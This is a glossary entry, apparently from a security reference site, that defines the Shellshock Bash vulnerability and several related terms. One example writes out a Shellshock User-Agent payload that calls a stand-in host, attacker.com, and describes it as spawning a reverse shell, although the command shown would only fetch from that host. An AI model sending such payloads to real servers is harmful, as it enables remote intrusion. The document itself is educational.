Vulnerabilities
Shellshock (CVE-2014-6271)
Also known as: Bashdoor, CVE-2014-6271
Definition
A 2014 GNU Bash vulnerability that let attackers run arbitrary commands by setting specially crafted environment variables passed to Bash through other programs.
Examples
- Sending a User-Agent header like () { :; }; /bin/curl attacker.com to a Bash-CGI endpoint to spawn a reverse shell.
- Exploiting a DHCP client that exports option strings into the environment of a Bash hook script.
Related terms
Command Injection
Command Injection — definition coming soon.
CVE (Common Vulnerabilities and Exposures)
A public catalogue that assigns a unique identifier to each disclosed software or hardware vulnerability so they can be referenced unambiguously across the industry.
Known Exploited Vulnerability (KEV)
A CVE that the U.S. CISA confirms is being actively exploited and adds to its public KEV Catalog, triggering remediation deadlines for U.S. federal agencies.
Remote Access Trojan (RAT)
Malware that gives an attacker covert, interactive control of an infected device, similar to a hidden remote-administration tool.
Exploit
A piece of code, data, or technique that takes advantage of a vulnerability to cause unintended behaviour such as code execution, privilege escalation, or information disclosure.
Privilege Escalation
A class of vulnerabilities that lets an attacker gain rights beyond those originally granted, such as moving from a normal user to administrator.